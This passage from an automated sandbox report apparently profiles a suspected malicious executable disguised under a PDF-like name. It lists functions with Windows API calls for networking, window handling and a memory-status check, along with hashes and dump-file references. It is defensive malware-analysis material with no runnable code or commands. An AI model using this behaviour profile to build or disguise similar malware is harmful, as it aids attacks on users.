                                                                                                                      • Instruction Fuzzy Hash: 07E04F366432119BD7605FB06E0CB563BB8AF51BA2F09C869E246CA040DA3884418B65
                                                                                                                      Function 00792187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 00792187
                                                                                                                      • GetDC.USER32(00000000), ref: 00792191
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                                                                                                                      • ReleaseDC.USER32(?), ref: 007921D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                                                                                                                      • Instruction ID: 54a21f0a7d9531e628fad1dcf01c4d0da4ef1071eb70253f05409471b0d44c9e
                                                                                                                      • Opcode Fuzzy Hash: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                                                                                                                      • Instruction Fuzzy Hash: 11E0CAB5801208EFDB01AFA0D808AAD7BB1EB4C351F10C42AE95AA7620CB7C82429F45
                                                                                                                      Function 0079219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 0079219B
                                                                                                                      • GetDC.USER32(00000000), ref: 007921A5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                                                                                                                      • ReleaseDC.USER32(?), ref: 007921D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                                                                                                                      • Instruction ID: 8b29249524a1df68e058ca2cf7166af5b05e9f95cea6172fd591891a26551f88
                                                                                                                      • Opcode Fuzzy Hash: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                                                                                                                      • Instruction Fuzzy Hash: CBE0EEB5801204EFCB01AFA0CC0869D7BF1EB4C311F10C42AF95AA7620CB7C92419F44
                                                                                                                      Function 007563A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %~
                                                                                                                      • API String ID: 0-3145668672
                                                                                                                      • Opcode ID: 59a5892b3f507a2256b6f04b1face8cd84ae9fff4a6e43f194d3f7efce5458e5
                                                                                                                      • Instruction ID: 1c51f1b87874b807c615f98aebcaa72d86ae0b5aad3801cec12ec6fc06312ad2
                                                                                                                      • Opcode Fuzzy Hash: 59a5892b3f507a2256b6f04b1face8cd84ae9fff4a6e43f194d3f7efce5458e5
                                                                                                                      • Instruction Fuzzy Hash: EDB1B271900109DBCF14EF94C4959FDB7B4FF44312F90402AED06A7295EBB89E9ACB91
                                                                                                                      Function 007BB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • __wcsnicmp.LIBCMT ref: 007BB298
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB361
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                      • String ID: LPT
                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                      • Opcode ID: a751b6d52844ce34c7809422648f2dc7f3082be36ad6c437f9638add9ebb8d46
                                                                                                                      • Instruction ID: 7901a228d66b9a402db53e2ee9007dde1e87a40c7449354d4283d9ffb3737d93
                                                                                                                      • Opcode Fuzzy Hash: a751b6d52844ce34c7809422648f2dc7f3082be36ad6c437f9638add9ebb8d46
                                                                                                                      • Instruction Fuzzy Hash: E6614E75A00215EFCB14DF94C885EEEB7F4EB48310F15805AF946AB291DBB8AE44CB50
                                                                                                                      Function 00798A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: Oav
                                                                                                                      • API String ID: 4104443479-1091017984
                                                                                                                      • Opcode ID: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
                                                                                                                      • Instruction ID: 377a5864d7a163cbd5b02aee29dc58c01efeb03546544f70fd4144da69e5598b
                                                                                                                      • Opcode Fuzzy Hash: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
                                                                                                                      • Instruction Fuzzy Hash: 3A5150B0900609DFCF64CF68D884AAEBBF1FF45304F14852AE85AD7350EB39A955CB51
                                                                                                                      Function 00762AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00762AC8
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00762AE1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
                                                                                                                      • Instruction ID: c10478231e65e06d0dedd026042e2cedee2f0d4663ce11b89d5d79a0f2cea47f
                                                                                                                      • Opcode Fuzzy Hash: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
                                                                                                                      • Instruction Fuzzy Hash: B5515871418745DBD320AF10D88ABABBBE8FF84311F42885DF6E9510A1DB798529CB26
                                                                                                                      Function 007B99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0075506B: __fread_nolock.LIBCMT ref: 00755089
                                                                                                                      • _wcscmp.LIBCMT ref: 007B9AAE
                                                                                                                      • _wcscmp.LIBCMT ref: 007B9AC1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                      • Opcode ID: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
                                                                                                                      • Instruction ID: 76132c69fbd74f36d0057e811895a6b5be4293d0c69e8b7a774a565e0619c552
                                                                                                                      • Opcode Fuzzy Hash: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
                                                                                                                      • Instruction Fuzzy Hash: B641B871A00659FADF20AAA4DC49FEFB7B9DF45710F004069BA14A71C1D6B99A0487A1
                                                                                                                      Function 007C2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007C2892
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007C28C8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                      • Opcode ID: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
                                                                                                                      • Instruction ID: cfae493e9685a94a706f0f7823618325533a29209d4d443dc4383956f56bacb9
                                                                                                                      • Opcode Fuzzy Hash: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
                                                                                                                      • Instruction Fuzzy Hash: 00311971800119EBCF05EFA1DC89EEEBFB9FF08310F104029E815A6166DB756A56DBA0
                                                                                                                      Function 007D6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 007D6D86
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D6DC2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: 9b71579761f729c11be477f196a88d85f59a8ffc6662b3281d121a1991bba740
                                                                                                                      • Instruction ID: b785b1260039b3c8498fbfa4b21cf37a2824e44aab7b9ee79ee51454222b7821
                                                                                                                      • Opcode Fuzzy Hash: 9b71579761f729c11be477f196a88d85f59a8ffc6662b3281d121a1991bba740
                                                                                                                      • Instruction Fuzzy Hash: 22319E71200204AEDF109F24DC84AFB77B9FF48720F10861AF9A697290DB79AC91DB64
                                                                                                                      Function 007B2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007B2E00
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B2E3B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: fa05b3eae75e2aec7419b90c421621ff27b09494d2752eb7466ac5856687588a
                                                                                                                      • Instruction ID: 8d3ed3b4cb7c632cae3e02c08576932d6ba82ca300de9f334982ac9a4ac8dd7a
                                                                                                                      • Opcode Fuzzy Hash: fa05b3eae75e2aec7419b90c421621ff27b09494d2752eb7466ac5856687588a
                                                                                                                      • Instruction Fuzzy Hash: A6310631601305EBEB248F49C84DBEEBBB9FF45340F24402AE985D61A2E778D942CB51
                                                                                                                      Function 007D6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D69D0
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D69DB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: da67a36222d0f4362b289d8273fd7fbc3054005e74688580fd77bb678d9a4ee7
                                                                                                                      • Instruction ID: 656af422ff626d9fe6b232fea0c161e462a850e57093e4ea4882fcdfff615bf8
                                                                                                                      • Opcode Fuzzy Hash: da67a36222d0f4362b289d8273fd7fbc3054005e74688580fd77bb678d9a4ee7
                                                                                                                      • Instruction Fuzzy Hash: BB11C471700208AFEF119F14CCA0EFB377EEB883A4F11412AF95897390D679AC5187A0
                                                                                                                      Function 007D6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                                        • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                                        • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007D6EE0
                                                                                                                      • GetSysColor.USER32(00000012), ref: 007D6EFA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: fcea34d3060ac7e6f8e87951e19b6a2decf939835cb842eb9364e6464435cc5f
                                                                                                                      • Instruction ID: 46bb6f9dd38ae8cc38cbc69f3e5775684458fd245c71b6d727248258fca1edd5
                                                                                                                      • Opcode Fuzzy Hash: fcea34d3060ac7e6f8e87951e19b6a2decf939835cb842eb9364e6464435cc5f
                                                                                                                      • Instruction Fuzzy Hash: 6C216A72610209AFDB04DFA8DD45AFA7BB8FB08315F04462AFD55D3250E738E861DB60
                                                                                                                      Function 007D6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 007D6C11
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D6C20
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: edit
                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                      • Opcode ID: 54b1a9cbbb5d5fca34e29d2e60f78a10194a7c486d1138f5aeaa15bae3b8d4ba
                                                                                                                      • Instruction ID: 7774ff2ebca401b3ed5e505274f9ceb899d051457e3040ef3daef902075db16e
                                                                                                                      • Opcode Fuzzy Hash: 54b1a9cbbb5d5fca34e29d2e60f78a10194a7c486d1138f5aeaa15bae3b8d4ba
                                                                                                                      • Instruction Fuzzy Hash: BB11BCB1101208ABEB108F64DC45AFB3B79EB04378F208726F965D32E0C779EC909B60
                                                                                                                      Function 007B2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007B2F11
                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007B2F30
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 4c869c815c1e82a1a62a466a52aca629dfb14b7cc7cd8a9df98677e816f48c39
                                                                                                                      • Instruction ID: 98e85c6aae3b383a3a861d3e7a285b3d9f35e7bd33f775fd86db1f54fdda133a
                                                                                                                      • Opcode Fuzzy Hash: 4c869c815c1e82a1a62a466a52aca629dfb14b7cc7cd8a9df98677e816f48c39
                                                                                                                      • Instruction Fuzzy Hash: 92119071902124AFDB20DB58DC48FE977B9EF05310F1840B5E865A72A2E7B8EE06C791
                                                                                                                      Function 007C24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C2520
                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2549
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                      • Opcode ID: 14eaea81888fc83a3747d1a6e115ab3d66b35e7ca3710d127aed6accd8240c6f
                                                                                                                      • Instruction ID: 9f393298045b5f7c02e32a73093de2e354f4ea87b96b1796fe7d10163ec416fe
                                                                                                                      • Opcode Fuzzy Hash: 14eaea81888fc83a3747d1a6e115ab3d66b35e7ca3710d127aed6accd8240c6f
                                                                                                                      • Instruction Fuzzy Hash: 4711E0B0201225BADB288F519C98FFBFF68FB06361F10816EF90542041D2786A62DAE0
                                                                                                                      Function 007C80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                      Download Yara Rule
